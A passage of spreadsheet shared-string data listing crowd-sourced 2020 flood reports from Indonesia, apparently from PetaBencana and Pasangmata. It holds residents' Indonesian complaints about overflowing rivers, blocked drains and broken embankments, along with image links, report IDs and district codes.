    <t>https://lh3.googleusercontent.com/49tTB6IxxiTPHnA6RAjyB447V_IFV0lYH09HK-E9Vlk8oBvDC_2WAdhBzhDKUFxNPyNJY9r-6jC3BiOSCzhOJ67TP1_G=s480-c</t>
  </si>
  <si>
    <t>tolong dan mohon di perhatikan setiap hujan beberapa menit di jl.perdana 5 dan jl.perdana 6 bagian belakang  RT.6 RW.12 air selalu merendam jalan dan surutnya lama di karenakan saluran airnya mampet,sebelumnya saya ucapkan terima kasih atas perhatiannya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/EY6byekUGKNJxZSfhrBT0AdlNIGAkhyNHnirnRTPTviCTEvrIULkGMpUyivx-0KA6Ezc1gmXhWlvISRUe6oEe4lVVKE=s480-c</t>
  </si>
  <si>
    <t>kali pesanggrahan kembangan meluap tolong di pantau pintu air ya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/l8KDCjwF1CxGMokFiqLfi9WJf8Db4CdXY087LMo0STvrC3VcBh0_P2vslm8Yb0Hqeqv6k4PpAGINprWTss_LlPUkNAau=s480-c</t>
  </si>
  <si>
    <t>ini sampe kapan waduk muara angke mesin sedot air nyh cuma 1. kan waduk nyh luas, di sini setiap hujan banjir terus, tolong, kita boleh sibuk convid-19 tapi kita jga harus tau penyakit jakarta yg dari dulu gak bisa di sembuhin, makasih\u1f609</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/yddqpou78g8T4XuJjnUaBrP-09G8y950B6t1eaSQeQoXWfogmuzkqRY88fK6STrXL0IsGHpVb2wE3HShRSYgOFWnOYuU=s480-c</t>
  </si>
  <si>
    <t>muara angke semenjak di benerin gotnya malah semakin parah hujan pasti banjir...tidak ada tindakam apa2 dr rw setempat dan dr kelurahan bagaimana cara menangulanginya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vzD49sN5txTax0UtmL7x35UhE0AGPEu_--wss9EJjAFlKp4xE8zjzwg7q-EcA0xpoRQrU9ejibHp09jpnsTN1xBp960=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1466", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>bapak yg twrhormat.. tolong dong ..saluran bkt nya di perhatikan kami banjir nihh pakk</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351356</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/16/15869813751508191879.jpg</t>
  </si>
  <si>
    <t>Di Tengah Pandemi Corona, Villa Setia Mekar Banjir</t>
  </si>
  <si>
    <t>Banjir di tengah pandemi Corona di Villa Setia Mekar kec. Tambun Selatan Kab. Bekasi</t>
  </si>
  <si>
    <t>83768b1f-5cf3-456f-af47-705b6db5f93f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/83768b1f-5cf3-456f-af47-705b6db5f93f.jpg</t>
  </si>
  <si>
    <t>Seperti ada tanggul yang jebol,butuh bantuan pemerintah,karena warga jadi berkumpul dan rentan penyakit padahal sedang pandemi corona</t>
  </si>
  <si>
    <t>Kalisuren</t>
  </si>
  <si>
    <t>Tajur Halang</t>
  </si>
  <si>
    <t>6e9a936a-fca0-4bc2-a617-3896878da6a3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6e9a936a-fca0-4bc2-a617-3896878da6a3.jpg</t>
  </si>
  <si>
    <t>Banjir ketika corona karena tanggul jebol?</t>
  </si>
  <si>
    <t>7542e27a-35d7-4468-ac10-b693b9ca1ee4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7542e27a-35d7-4468-ac10-b693b9ca1ee4.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 140 }</t>
  </si>
  <si>
    <t>Banjir di bukit sawangan indah, Bojongsari, Depok, Jawa barat 18 April 2020</t>
  </si>
  <si>
    <t>89021786-3282-478b-8849-7ccb22e36f08</t>
  </si>
  <si>
    <t>https://images.petabencana.id/89021786-3282-478b-8849-7ccb22e36f08.jpg</t>
  </si>
  <si>
    <t>banjir dr luapan kali disamping perumahan Bukit Sawangan Indah Depok</t>
  </si>
  <si>
    <t>1fc7bf26-bb64-4bd0-984f-15e59332df75</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1fc7bf26-bb64-4bd0-984f-15e59332df75.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-AC" }</t>
  </si>
  <si>
    <t>Ayo jaga bumi dengan tidak buang sampah sembarangan #pesanuntukbumi #dirumahaja"</t>
  </si>
  <si>
    <t>Cot Baroh</t>
  </si>
  <si>
    <t>Kuta Blang</t>
  </si>
  <si>
    <t>Bireuen</t>
  </si>
  <si>
    <t>Aceh</t>
  </si>
  <si>
    <t>4facd111-41af-42ee-960c-3d4115220bdc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4facd111-41af-42ee-960c-3d4115220bdc.jpg</t>
  </si>
  <si>
    <t>Yuk jaga bumi dengan tidak membuang sampah sembarangan. #pesanuntukbumi"</t>
  </si>
  <si>
    <t>Samuti Aman</t>
  </si>
  <si>
    <t>Ganda Pura</t>
  </si>
  <si>
    <t>69f05219-d09e-4d8c-9979-3c9a1ad2d2de</t>
  </si>
  <si>
    <t>https://images.petabencana.id/69f05219-d09e-4d8c-9979-3c9a1ad2d2de.jpg</t>
  </si>
  <si>
    <t>Air kali di pinggir perumahan Puri 11 meluap sebelum ada proyek Puri 11 tidak banajir sekarang ada proyek menjadi banjir</t>
  </si>
  <si>
    <t>Pondok Bahar</t>
  </si>
  <si>
    <t>40e40d44-5664-46ff-a7c7-191d6b3577c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/40e40d44-5664-46ff-a7c7-191d6b3577c9.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ru0KwqR83LM3pjJmXVGQe96vvrJERri4TYpjXD6f0JFIbjFp8Ccit0GxerYdEdTmAtH8_UJ6kb8VFoUIApB--H0v_mr-=s480-c</t>
  </si>
  <si>
    <t>banjir air kali meluap pesanggrahan kembangan #KaliMeluap</t>
  </si>
  <si>
    <t>dfb5be64-bd47-4711-93df-e1cbb5459590</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dfb5be64-bd47-4711-93df-e1cbb5459590.jpg</t>
  </si>
  <si>
    <t>Puri kartika baru, tajur, ciledug, tangerang kota</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ud09K9my7beNypszTAIsFkFDmIMoDJpMKjBwN5R71AhfK5qsuUXKtOOJta5_0Klupml2H5uBG2joaeHCLs7KHubCxbHY=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2503", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Got di jln swadaya 1A / III ( got sebelah selatan) mampet parah, tolong PPSU PETIR segera action, bersihkan lumpur yg mengendap digot spy air lancar, shg hujan kecil saja tdk banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Ai95q35yDLRV180_r0iAsFzLocOnXmNZbE8Bw8rshiapz6NvaB5eI0DHlPCwO_1eF-ri4Oz03RVv9t1qJFIfpL9v_IQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "850", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jalan palem dan cemara banjir lagi. sudah 5 tahun begini terus tidak ada perubahan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DdeyO9zuqf5vpZd7DTFv2l-usYa_8baW-_-THthSa0sB8FoA5kRW8hYkuBPQVYvFfpi-P-TqeqM5M2VsCxYdkPtJCXQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1276", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jl. terusan i no 21a komplek polri ampera</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jb7v5legMmJ-t_mSyAE1BPU7sHBwIhMJbZd7aQysKCTYAt1fuYAJ2WwSyUSetRjRBy-2__OZbaLEi9DvVP_rw7O6IGp5=s480-c</t>
  </si>
  <si>
    <t>banjir lagi ... #KaliMeluap #BanjirKecil</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ZkiogedcLUe7p0mHhd2qQT5ssn1iPiA54Jfr13Apd4-rV5BNkkEHC8nKOvPvuYLeUK9zeHqoCaKqOdee7dYEK--medk=s480-c</t>
  </si>
  <si>
    <t>air meluap deras, tiap hujan meluap dan banjir, blm ada penanganan dan solusi, mohon dibantu pak, padahal tahun tahun sebelumnya jarang bngt banjir, ttpi skrng tiap hujan banjir, dimohon solusi dan bantuannya rt 06/06 jatipadang #KaliMeluap #banjir"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rmy3-GHEe4IVNrKcWFDg5FRTyxTk92R6qIyl0qlZDaQSpDPVCy6fum2HsXy6NTiZD5KOfX9XwLP8qSipFZiO3Nr2BgCF6A=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/eOMgsENwbppABV9IEjLbxqjMoopIXyQeZB1YGq2h-gWwGjpLNvVXvv1n8LajSd14KYkTHrp6jTNFH3NM_25B9Vf1504=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap kami warga Rt08 Rw002 (depan samsat pajak) rawa buaya cengkareng jakarta barat ingin meminta untuk mengatasi banjir yang selalu terjadi di wilayah kami saat hujan/tidak sebab pintu air tidak berfungsi mngakibatkan ketika air kali pasang s"</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351801</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/27/15880020301521418403.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1301", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Hujan Cukup Deras, Jalan Wijaya VI Petogokan Tergenang</t>
  </si>
  <si>
    <t>Akibat curah hujan cukup deras,air genang kisaran 30cm di Jalan Wijaya VI Petogokan,sampai malam ini belum surut, Semoga pemerintah cepat mencari jalan keluarnya untuk Jakarta bebas banjir</t>
  </si>
  <si>
    <t>d0720fe9-195e-4d47-9eba-8747ad0b1f29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d0720fe9-195e-4d47-9eba-8747ad0b1f29.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2373", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Rawajati</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/iN5Yemhkd18ZQsEchi4f1Rd3ymY_zsi-FhP3eup8LT09WrI3-siy5ahvTR4rber-BAMY7mvOaVFsZWvu9HaZxfr0iN5tWA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1801", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tolong penanganan nya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Qz4rK6TuqTtymCAEFXDlCLFZQqQsh2MLGm0PH9184z73baVK26V3U0IYWTttCgWwqhCQxTRjRv46VqvhmpqPdoU1l2SF=s480-c</t>
  </si>
  <si>
    <t>banjir sampai masuk ke rumah warga</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/nxNU4bhs8fWOg9tkN-MaNkk5bg7L_MkmJHg386YURnuBoZPkVtXnUDUJE_mH3IDXD1FHUvVNZ2sB76fV1wMlXM_U99BS=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1758", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>mohon di bantu agar adakan pengerukan dan penertiban bangunan yg ada di atas kali yg menghalangi aliran air</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ZoEvOEGuFWP08ZEYGBFCKy58Q8XBz5sgxXt8LZSZE4Jw-Xtduitc0bCaUHY1EaPszh2Jqov3hzFQNl0BaKpY_cpVWUXVEQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2347", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#SaluranTersumbat #SaluranKotor banyak pasir air cepet naik</t>
  </si>
  <si>
    <t>9968b484-da7a-47b5-b9cf-0d40d78bca2c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9968b484-da7a-47b5-b9cf-0d40d78bca2c.jpg</t>
  </si>
  <si>
    <t>Banjir datang dari kiriman dan sangat kotor sekitar pukul 15:00 dan belum ada penangannan dari peemrintah daerah dan juga bantuan</t>
  </si>
  <si>
    <t>edace8f7-d856-4ced-bad4-12aad5454fed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/edace8f7-d856-4ced-bad4-12aad5454fed.jpg</t>
  </si>
  <si>
    <t>Tidak pernah ada tindak lanjut. Cuma lapor lapor lapor. Pemprov tolong urus kami, proaktif! Pansus banjir juga</t>
  </si>
  <si>
    <t>9ab673a0-b5a9-4dd7-a8bf-177a74ed1ed4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ab673a0-b5a9-4dd7-a8bf-177a74ed1ed4.jpg</t>
  </si>
  <si>
    <t>Hujan lebat mengakibatkan kali buncit meluap dan membuat SMAN terendam banjir setinggi pinggang orang dewasa</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/b2mvxihhZE2NUDpC5jw63KtD2iYpljdg2WSxMCrwgtgpdei3oMmOU380_u0xqvVwJjy4Ebm1WpVWPZXgonA3kmCZd7ud=s480-c</t>
  </si>
  <si>
    <t>banjir mluuu</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351853</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/30/15881863241664856376.jpg</t>
  </si>
  <si>
    <t>Swadarma Raya Banjir, Warga Minta Perhatian Pemerintah</t>
  </si>
  <si>
    <t>Hujan datang Jl. Swadarma Raya, Ulujami mesti banjir, puluhan tahun masalah banjir jalan utama ini belum selesai, berharap pemerintah terkait agar diprioritaskan.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351857</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/04/29/15881581091148936735.jpg</t>
  </si>
  <si>
    <t>Hujan Turun, Ulujami Terendam Banjir</t>
  </si>
  <si>
    <t>Banjir pasti berlalu belum dirasakan 4 RW di Kelurahan Ulujami, Jakarta Selatan. Hujan turun banjir pun datang, yang lebih parah di RW 01 hampir selurah rumah air masuk ke dalam rumah mereka. Semoga pemerintah terkait bisa menyelesaikan banjir yang sudah</t>
  </si>
  <si>
    <t>50ea0e9b-3e08-42f6-9f5d-422c94c50360</t>
  </si>
  <si>
    <t>Banjir dari kali</t>
  </si>
  <si>
    <t>Renged</t>
  </si>
  <si>
    <t>Binuang</t>
  </si>
  <si>
    <t>Serang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/fZ51J_wSnpOGp4DQAzsQpeWiAxEp19R8pVAwxdznhWPpDHoH9uVqgOqQvIZipmXarZcAb1vrYHSFjL-lyT0RPyEvZD1j=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1249", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tolong Tim Alkal untuk segera mengeruk got saluran air khususnya komplek Kejagung Pasarminggu di Blok i yg berbatasan dengan benteng UNAS. Sudah 2 hari hujan besar tgl 29-30 April 2020 komplek Kejagung Pasarminggu kebanjiran. Tolong untuk segera ditindak"</t>
  </si>
  <si>
    <t>76a70420-1a84-48e1-aa27-444db5b2d892</t>
  </si>
  <si>
    <t>https://images.petabencana.id/76a70420-1a84-48e1-aa27-444db5b2d892.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1242", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir pada hari Rabu 29 April 2020 tinggi sekitar 20 cm, tdk pernah banjir sebelumnya, hujam hanya sekitar 1 jam.</t>
  </si>
  <si>
    <t>d9038c6e-3509-4580-94d0-37d9ca220d82</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d9038c6e-3509-4580-94d0-37d9ca220d82.jpg</t>
  </si>
  <si>
    <t>Banjir dikawasan waas dan sekitarnya, banyak rumah yang terendam karena air yang sangat cepat naik.</t>
  </si>
  <si>
    <t>Sukasari</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/351960</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/05/04/351960-15885643011846881562.mov-03.jpg</t>
  </si>
  <si>
    <t>Video Taman Pemakaman Pahlawan Cikutra Ambruk karena Hujan</t>
  </si>
  <si>
    <t>Taman pemakaman pahlawan ambruk terjadi pada hari Sabtu sore tgl.2-5-2020. Jam.15:42 WIB di karenakan hujan lebat. Sampai mayat pun terbawa arus air sungai deras.</t>
  </si>
  <si>
    <t>Sukahaji</t>
  </si>
  <si>
    <t>5adc29f2-6204-47b4-b5a7-ac1738c06c23</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5adc29f2-6204-47b4-b5a7-ac1738c06c23.jpg</t>
  </si>
  <si>
    <t>Daerah Bukit Palem</t>
  </si>
  <si>
    <t>Kotabumi</t>
  </si>
  <si>
    <t>Purwakarta</t>
  </si>
  <si>
    <t>Cilegon</t>
  </si>
  <si>
    <t>59f25140-c12f-49dc-be6d-fd9e4d3843e7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/59f25140-c12f-49dc-be6d-fd9e4d3843e7.jpg</t>
  </si>
  <si>
    <t>Masigit</t>
  </si>
  <si>
    <t>11ec45e7-fc89-46e3-994f-f64e07e31c05</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11ec45e7-fc89-46e3-994f-f64e07e31c05.jpg</t>
  </si>
  <si>
    <t>Hujsn deras dan banjir</t>
  </si>
  <si>
    <t>cf61c350-f2c8-46c7-9952-4941cbb10e2f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cf61c350-f2c8-46c7-9952-4941cbb10e2f.jpg</t>
  </si>
  <si>
    <t>7840931f-65bb-4e3f-8fda-0c3ca40380b3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7840931f-65bb-4e3f-8fda-0c3ca40380b3.jpg</t>
  </si>
  <si>
    <t>Mulai banjir sejak tadi subuh hingga sekarang. Dari tadi malam hujan deras</t>
  </si>
  <si>
    <t>Kampung Baru</t>
  </si>
  <si>
    <t>Baiturrahman</t>
  </si>
  <si>
    <t>Banda Aceh</t>
  </si>
  <si>
    <t>a3650a79-a6ca-472c-86df-2b91430feedb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3650a79-a6ca-472c-86df-2b91430feedb.jpg</t>
  </si>
  <si>
    <t>Banjir karena hujan tidak berhenti dari malam sampai sekarang jam 15.58</t>
  </si>
  <si>
    <t>Ateuk Pahlawan</t>
  </si>
  <si>
    <t>7ff105f2-7f70-4954-a008-fdbc61a90c31</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7ff105f2-7f70-4954-a008-fdbc61a90c31.jpg</t>
  </si>
  <si>
    <t>*photo may subject to copyright</t>
  </si>
  <si>
    <t>3225ceb7-c082-4626-8c3b-03e4348f8347</t>
  </si>
  <si>
    <t>Meluap air sungai dan membuat akses jalan tergenang dan banjir</t>
  </si>
  <si>
    <t>Krueng Simpo</t>
  </si>
  <si>
    <t>Juli</t>
  </si>
  <si>
    <t>dabfc48c-7575-45ea-9a86-e53e5eac15a3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dabfc48c-7575-45ea-9a86-e53e5eac15a3.jpg</t>
  </si>
  <si>
    <t>eksploitasi alam dimana mana menjadikan ujan dikit banjir</t>
  </si>
  <si>
    <t>Sojomerto</t>
  </si>
  <si>
    <t>Gemuh</t>
  </si>
  <si>
    <t>Kendal</t>
  </si>
  <si>
    <t>df35e626-d997-410c-93c3-4611ca45cfd3</t>
  </si>
  <si>
    <t>Banjir terus tiap tahun kasian jadi longsor</t>
  </si>
  <si>
    <t>Kebomlati</t>
  </si>
  <si>
    <t>Plumpang</t>
  </si>
  <si>
    <t>Tuban</t>
  </si>
  <si>
    <t>36031589-4487-4b41-bf85-cdc84b065abe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/36031589-4487-4b41-bf85-cdc84b065abe.jpg</t>
  </si>
  <si>
    <t>Tanggul jebol di komplek pejaten indah. Penyempitan kali mampang juga membuat banjir semakin sering. SOS tata air mohon tinggikan jembatan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/W5NJi4WHmGxhgKywInK63bEbGev5FQjlgOI9w6LLB87nYTH0rNLxfvT1rkfFoAtfAy9JLDzF6zmz_t4kH5pWc1CtawZU2A=s480-c</t>
  </si>
  <si>
    <t>jl. swadaya 1A/III banjir meskipun hujan kecil, krn gotnya tidak lancar, tolong PPSU PETIR</t>
  </si>
  <si>
    <t>efb2bf5f-e543-4822-8fa5-1726fd2050bd</t>
  </si>
  <si>
    <t>earthquake</t>
  </si>
  <si>
    <t>{ "report_type": "structure", "structureFailure": 1 }</t>
  </si>
  <si>
    <t>aa</t>
  </si>
  <si>
    <t>05d4b8ad-5ce8-4edf-905d-2261c3d6c8f3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05d4b8ad-5ce8-4edf-905d-2261c3d6c8f3.jpg</t>
  </si>
  <si>
    <t>Rejosari</t>
  </si>
  <si>
    <t>Pangkal Balam</t>
  </si>
  <si>
    <t>Pangkal Pinang</t>
  </si>
  <si>
    <t>d5e4e2a2-e4e8-4dbe-bfa2-2bb2df9eb72a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d5e4e2a2-e4e8-4dbe-bfa2-2bb2df9eb72a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1189", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di kalibaata Timur</t>
  </si>
  <si>
    <t>09fd6242-cbdf-4763-a5d2-456908bcbbf1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09fd6242-cbdf-4763-a5d2-456908bcbbf1.jpg</t>
  </si>
  <si>
    <t>Semoga banjirnya cepat surut</t>
  </si>
  <si>
    <t>Tamalanrea Indah</t>
  </si>
  <si>
    <t>Tamalanrea</t>
  </si>
  <si>
    <t>75792905-bef9-408d-9cd5-9df9b031a54c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/75792905-bef9-408d-9cd5-9df9b031a54c.jpg</t>
  </si>
  <si>
    <t>Banjir di wilayah wanajaya, cibitung, kabupaten bekasi</t>
  </si>
  <si>
    <t>2422940a-924b-4b6b-9d1c-a301f6f8de6c</t>
  </si>
  <si>
    <t>air sudah full tinggal tumpah di daerah lokasi yang saya tandai.</t>
  </si>
  <si>
    <t>1cb2d0c5-1609-4560-9a19-805bde09db4f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1cb2d0c5-1609-4560-9a19-805bde09db4f.jpg</t>
  </si>
  <si>
    <t>Banjir di villa nusa indah blok S jatiasih bekasi</t>
  </si>
  <si>
    <t>6081940e-71c3-42a5-b2cf-d52ff7c6b373</t>
  </si>
  <si>
    <t>Sirine udah bunyi, orang orang udah mindah2in kendaraan.. stay safe everyone</t>
  </si>
  <si>
    <t>ece8bc1b-b9c1-4884-8047-9caeba07fd1b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ece8bc1b-b9c1-4884-8047-9caeba07fd1b.jpg</t>
  </si>
  <si>
    <t>Listrik sudah padam. Jika banjirnya bertahan lama, kami tidak punya pangan untuk sahur</t>
  </si>
  <si>
    <t>77e3c4c3-dea2-4bf4-997b-79e49f67b197</t>
  </si>
  <si>
    <t>Banjir di dalam rumah sudah sebetis (foto tidak bisa diinput)</t>
  </si>
  <si>
    <t>f8a633a1-70a3-47f7-91ef-9725c164722c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f8a633a1-70a3-47f7-91ef-9725c164722c.jpg</t>
  </si>
  <si>
    <t>Villa Nusa Indah 2 mulai terendam air dijalan utama nya</t>
  </si>
  <si>
    <t>8dc9aaf2-227b-49b5-91c1-3bbee66d9032</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8dc9aaf2-227b-49b5-91c1-3bbee66d9032.jpg</t>
  </si>
  <si>
    <t>Banjir Perumahan Bukit Sawangan Indah, Sawangan, Depok</t>
  </si>
  <si>
    <t>e5a558bf-4039-4fee-888d-50f0f669a2d0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e5a558bf-4039-4fee-888d-50f0f669a2d0.jpg</t>
  </si>
  <si>
    <t>Banjir di desa sukamanah 2 kec. parung panjang mulai dini hari antara jam 1-2 wib. kedalaman mencapai setengah meter di luar rumah.</t>
  </si>
  <si>
    <t>Parung Panjang</t>
  </si>
  <si>
    <t>9dba79b6-0c7f-4113-8ba1-dfe8d860ca4e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9dba79b6-0c7f-4113-8ba1-dfe8d860ca4e.jpg</t>
  </si>
  <si>
    <t>Banjir yang diakibatkan jebolnya tanggul Raga Mukti daerah Arco. Sudah hampir ke 8 Kali terhitung sejak Februari, terakhir tanggal 18 April</t>
  </si>
  <si>
    <t>c4e99e54-5aee-47db-9157-fe18242bad71</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c4e99e54-5aee-47db-9157-fe18242bad71.jpg</t>
  </si>
  <si>
    <t>BANJIR DI KAWASAN JATINEGARA JAKARTA TIMUR, JL KEBON PALA 1 TANAH RENDAH GANG.2</t>
  </si>
  <si>
    <t>36d5bd71-905e-4b51-aa38-05be063630c0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/36d5bd71-905e-4b51-aa38-05be063630c0.jpg</t>
  </si>
  <si>
    <t>BANJIR SIAGA 3 DI JATINEGARA JAKARTA TIMUR</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/MwPDWtZ8lo2EWXkPBkwZJVJKUWpMofQqezrAjKOfNCoaY41sgEiak3DW7_725TK4PfI__sxUqdIR7V83DtGb9-6S17bB=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "871", "instance_region_code": "ID-BT" }</t>
  </si>
  <si>
    <t>Kompleks cirendeu permai, jaksel sudah beberapa kali kebanjiran tahun ini. Tolong donk kali dikerukin lagi dan got-got dibersihkan seperti dulu.  Tiap bulan air got tambah tinggi. Drainase juga mampet sepertinya karena kl banjir lama surutnya. Dari 2015</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/352325</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/05/19/15898475121828417659.jpg</t>
  </si>
  <si>
    <t>Terdapat Genangan Air di Kawasan Kemang Akibat Hujan</t>
  </si>
  <si>
    <t>Akibat hujan turun basahi kawasan Kemang, Jalan Kemang Utara IX Bangka dan sekitarnya terdapat genangan air.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/kZ2ToIq6L5te42_y7D0VUADgAe3F-slrS3KiHklFgIxujrMfeMbJiD1HPsTjhyYoBOnS_NkKawxg8aRBUJMRVwS_L50=s480-c</t>
  </si>
  <si>
    <t>pembatas kali jebol</t>
  </si>
  <si>
    <t>Mekarsari</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/73be0nWdZxvm7uPxvTYhvSEoHDivgB8_ZQedDXS8FQlbU8y-95271XbJRu05Kq7wvFwGg6xSfOMW0yPG7TgfAaF63ps=s480-c</t>
  </si>
  <si>
    <t>9fd71f52-aa64-41fc-911f-4e3fc78f1e24</t>
  </si>
  <si>
    <t>cek</t>
  </si>
  <si>
    <t>Klumpit</t>
  </si>
  <si>
    <t>Gebog</t>
  </si>
  <si>
    <t>Kudus</t>
  </si>
  <si>
    <t>9679b815-fbd2-4f7a-8b2c-377788131891</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9679b815-fbd2-4f7a-8b2c-377788131891.jpg</t>
  </si>
  <si>
    <t>Banjir sekitar 40-100cm di Perumahan Bukit Sawangan Indah, Kelurahan Duren Mekar, Kecamatan Bojongsari, Kota Depok. Dikarenakan tanggul jebo</t>
  </si>
  <si>
    <t>2ec1f8b8-c24e-4044-a158-79cec3fc5300</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2ec1f8b8-c24e-4044-a158-79cec3fc5300.jpg</t>
  </si>
  <si>
    <t>Banjir 8 kali yang terparah seleher orang dewasa</t>
  </si>
  <si>
    <t>6a25e8c3-e219-4ed8-9e3f-cc3dc0830b89</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6a25e8c3-e219-4ed8-9e3f-cc3dc0830b89.jpg</t>
  </si>
  <si>
    <t>Alamat Perumahan Bukit Sawangan Indah, Kelurahan Duren Mekar, Kecamatan Bojongsari, kota Depok. Akibat tanggul jebol.</t>
  </si>
  <si>
    <t>cffbe55e-4bdc-4109-9d8e-321ee77bf05f</t>
  </si>
  <si>
    <t>Banjir setiap saat karena tanggul blm dibenerin</t>
  </si>
  <si>
    <t>4135fad1-bc85-4eb0-9645-b52645f09055</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4135fad1-bc85-4eb0-9645-b52645f09055.jpg</t>
  </si>
  <si>
    <t>Batangkaluku</t>
  </si>
  <si>
    <t>Somba Opu</t>
  </si>
  <si>
    <t>Gowa</t>
  </si>
  <si>
    <t>0d4f2be7-54b8-4cdf-aef8-ed351cadb575</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0d4f2be7-54b8-4cdf-aef8-ed351cadb575.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-KI" }</t>
  </si>
  <si>
    <t>Banjir? Dah biasa ??</t>
  </si>
  <si>
    <t>Air Putih</t>
  </si>
  <si>
    <t>Samarinda Ulu</t>
  </si>
  <si>
